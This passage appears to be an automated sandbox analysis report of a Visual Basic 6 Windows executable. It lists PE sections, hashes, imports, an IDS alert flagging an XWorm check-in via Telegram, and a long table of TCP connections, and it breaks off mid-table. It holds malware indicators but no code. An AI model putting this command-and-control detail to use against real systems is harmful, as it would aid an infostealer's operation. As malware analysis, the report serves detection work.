IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x220	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x191d4	0x1a000	e9a068bc69a6cce92101af62753d223a	False	0.35633263221153844	data	5.734799312113526	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x1b000	0x180c	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d000	0x13f0	0x2000	e56e1953d9874a9ddfefca7c7d119b48	False	0.1533203125	data	2.9154531166496023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d130	0xcd0	Device independent bitmap graphic, 32 x 64 x 24, image size 3072			0.12835365853658537
RT_GROUP_ICON	0x1de00	0x14	data			1.15
RT_VERSION	0x1de14	0x1ec	data	English	United States	0.5020325203252033
RT_MANIFEST	0x1e000	0x3e7	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.42542542542542544

Imports

DLL

Import

MSVBVM60.DLL

EVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-02T14:25:22.875559+0200	TCP	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	49765	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 14:24:04.184782028 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:04.193756104 CEST	80	49709	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:04.193834066 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:04.194107056 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:04.201881886 CEST	80	49709	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:04.922636986 CEST	80	49709	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:04.922653913 CEST	80	49709	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:04.922784090 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:05.127778053 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:05.127837896 CEST	49709	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:06.403923988 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:06.408821106 CEST	80	49710	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:06.408936977 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:06.409231901 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:06.414041042 CEST	80	49710	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:07.105370045 CEST	80	49710	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:07.105393887 CEST	80	49710	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:07.105443954 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:07.105479956 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:07.106003046 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:07.106035948 CEST	49710	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:08.406547070 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:08.411384106 CEST	80	49711	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:08.411499977 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:08.411746979 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:08.416594982 CEST	80	49711	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:09.103180885 CEST	80	49711	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:09.103200912 CEST	80	49711	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:09.103245020 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:09.103287935 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:09.104123116 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:09.104222059 CEST	49711	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:10.381360054 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:10.391084909 CEST	80	49716	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:10.391166925 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:10.391468048 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:10.396338940 CEST	80	49716	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:11.095881939 CEST	80	49716	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:11.095935106 CEST	80	49716	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:11.095972061 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:11.095972061 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:11.102164030 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:11.102250099 CEST	49716	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:12.505167007 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:12.510215044 CEST	80	49720	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:12.510307074 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:12.510562897 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:12.515369892 CEST	80	49720	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:13.196974993 CEST	80	49720	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:13.197010040 CEST	80	49720	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:13.197062016 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:13.197094917 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:13.199058056 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:13.199099064 CEST	49720	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:14.725714922 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:14.934839964 CEST	80	49721	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:14.934946060 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:14.935251951 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:14.940062046 CEST	80	49721	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:15.649697065 CEST	80	49721	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:15.649722099 CEST	80	49721	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:15.649781942 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:15.655915022 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:15.656027079 CEST	49721	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:17.077405930 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.082498074 CEST	80	49722	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:17.083060980 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.181340933 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.186281919 CEST	80	49722	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:17.779237986 CEST	80	49722	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:17.779304028 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.779731989 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.779762983 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:17.779797077 CEST	80	49722	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:17.779846907 CEST	49722	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:19.022995949 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:19.028968096 CEST	80	49723	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:19.029191971 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:19.029438019 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:19.035000086 CEST	80	49723	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:19.716650963 CEST	80	49723	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:19.716675997 CEST	80	49723	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:19.716900110 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:19.892117023 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:19.892271042 CEST	49723	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:21.254558086 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:21.259500980 CEST	80	49724	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:21.259598017 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:21.260008097 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:21.264776945 CEST	80	49724	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:21.965181112 CEST	80	49724	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:21.965212107 CEST	80	49724	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:21.965271950 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:21.971992970 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:21.972023964 CEST	49724	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:23.415360928 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:23.420219898 CEST	80	49725	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:23.420337915 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:23.420655012 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:23.425427914 CEST	80	49725	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:24.117950916 CEST	80	49725	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:24.118014097 CEST	80	49725	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:24.118033886 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:24.118079901 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:24.118551016 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:24.118583918 CEST	49725	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:25.365221977 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:25.370592117 CEST	80	49726	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:25.370690107 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:25.379996061 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:25.384835958 CEST	80	49726	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:26.055723906 CEST	80	49726	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:26.055814981 CEST	80	49726	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:26.055883884 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:26.057199955 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:26.065428019 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:26.066024065 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:26.070760965 CEST	80	49726	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:26.070822954 CEST	49726	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:27.352930069 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:27.358447075 CEST	80	49727	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:27.358764887 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:27.358764887 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:27.364252090 CEST	80	49727	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:28.052905083 CEST	80	49727	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:28.053004026 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:28.053057909 CEST	80	49727	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:28.053091049 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:28.053672075 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:28.053788900 CEST	49727	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:29.414237976 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:29.499806881 CEST	80	49728	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:29.499891996 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:29.500175953 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:29.504940987 CEST	80	49728	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:30.185899973 CEST	80	49728	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:30.185969114 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:30.186043024 CEST	80	49728	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:30.186089039 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:30.186455011 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:30.186485052 CEST	49728	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:31.399763107 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:31.404726028 CEST	80	49729	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:31.404802084 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:31.409986019 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:31.414978027 CEST	80	49729	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:32.108582020 CEST	80	49729	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:32.108606100 CEST	80	49729	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:32.108654022 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:32.108689070 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:32.108990908 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:32.109021902 CEST	49729	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:33.384723902 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:33.391092062 CEST	80	49730	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:33.391256094 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:33.391478062 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:33.397706985 CEST	80	49730	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:34.098223925 CEST	80	49730	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:34.098293066 CEST	80	49730	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:34.098315001 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:34.098356962 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:34.100837946 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:34.100855112 CEST	49730	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:35.336050034 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:35.341053963 CEST	80	49731	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:35.341655016 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:35.342643976 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:35.347543001 CEST	80	49731	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:36.048266888 CEST	80	49731	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:36.048305988 CEST	80	49731	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:36.048388958 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:36.054754972 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:36.054855108 CEST	49731	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:37.286108971 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:37.291273117 CEST	80	49732	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:37.291371107 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:37.291599989 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:37.298460960 CEST	80	49732	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:38.001218081 CEST	80	49732	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:38.001245975 CEST	80	49732	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:38.001293898 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:38.001343012 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:38.001899004 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:38.001929045 CEST	49732	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:39.200134039 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:39.205157042 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:39.205236912 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:39.205668926 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:39.210448980 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.359330893 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.359425068 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.359559059 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.359594107 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.359621048 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.359639883 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.359668970 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.359760046 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.359808922 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.359842062 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:40.364537954 CEST	80	49733	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:40.364624977 CEST	49733	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:41.394125938 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:41.401118040 CEST	80	49734	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:41.401195049 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:41.401356936 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:41.406141996 CEST	80	49734	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:42.098434925 CEST	80	49734	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:42.098453999 CEST	80	49734	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:42.098490000 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:42.098521948 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:42.099930048 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:42.099965096 CEST	49734	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:43.145248890 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.150264025 CEST	80	49735	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:43.150438070 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.153199911 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.158869982 CEST	80	49735	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:43.876002073 CEST	80	49735	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:43.876029968 CEST	80	49735	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:43.876089096 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.876130104 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.877273083 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:43.877273083 CEST	49735	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:44.863955975 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:44.868777990 CEST	80	49736	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:44.868863106 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:44.869262934 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:44.880316973 CEST	80	49736	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:45.592941046 CEST	80	49736	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:45.592957973 CEST	80	49736	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:45.593015909 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:45.593902111 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:45.593902111 CEST	49736	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:46.493242979 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:46.498645067 CEST	80	49737	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:46.498734951 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:46.502655983 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:46.507725000 CEST	80	49737	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:47.183583975 CEST	80	49737	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:47.183607101 CEST	80	49737	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:47.183670998 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:47.183712959 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:47.188812971 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:47.188898087 CEST	49737	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:48.146580935 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:48.314332008 CEST	80	49738	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:48.314425945 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:48.318089962 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:48.322971106 CEST	80	49738	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:49.040725946 CEST	80	49738	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:49.040757895 CEST	80	49738	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:49.040817976 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:49.041177988 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:49.041327000 CEST	49738	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:49.895581007 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:49.900737047 CEST	80	49740	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:49.900819063 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:49.901312113 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:49.907948017 CEST	80	49740	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:50.615811110 CEST	80	49740	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:50.615828037 CEST	80	49740	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:50.615911961 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:50.625972033 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:50.626013994 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:50.632987976 CEST	80	49740	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:50.633054972 CEST	49740	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:51.380110979 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:51.388741970 CEST	80	49741	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:51.388851881 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:51.389072895 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:51.395236969 CEST	80	49741	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:52.075927973 CEST	80	49741	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:52.075952053 CEST	80	49741	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:52.075999975 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:52.076035023 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:52.076370001 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:52.076457977 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:52.085174084 CEST	80	49741	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:52.085427999 CEST	49741	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:52.756283998 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:52.761221886 CEST	80	49742	74.125.133.82	192.168.2.5
